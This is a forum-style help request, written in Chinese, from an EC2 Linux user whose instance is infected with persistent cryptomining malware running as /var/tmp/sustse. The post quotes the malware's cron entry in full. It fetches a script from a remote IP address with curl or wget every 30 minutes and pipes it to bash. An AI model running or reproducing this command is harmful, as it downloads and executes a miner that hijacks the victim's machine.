過去幾天,我注意到在我的 EC2 Linux 執行個體上運行的應用程式非常緩慢。運行top命令顯示有一個進程/var/tmp/sustse佔用了大部分 CPU。
我殺掉了那個進程。然而,重新啟動實例後,它再次開始運行並利用大部分 CPU。它還為以下腳本建立 cron 條目:
*/30 * * * * (curl -s http://107.174.47.156/mr.sh||wget -q -O - http://107.174.47.156/mr.sh)|bash -sh
我用谷歌搜尋發現這是一個加密貨幣挖礦惡意軟體。我已經去除了它的痕跡/var/tmp/並刪除了 Crontab 中的條目。然而,Crontab 中的這些條目似乎是從某個地方返回的,我無法追蹤生成這些條目的腳本的確切位置。
我還清理了 /var/spool/cron* 條目。
我在網上沒有找到任何資訊來解決這個問題。任何幫助將不勝感激。
提前致謝!